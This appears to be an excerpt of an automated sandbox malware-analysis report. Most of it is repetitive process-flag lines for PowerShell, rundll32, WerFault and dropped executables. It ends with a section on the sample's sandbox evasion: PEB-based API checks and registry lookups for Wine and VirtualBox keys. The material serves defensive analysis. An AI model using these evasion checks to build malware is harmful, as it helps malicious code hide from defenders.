Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File opened: HKEY_CURRENT_USER\Software\Wine
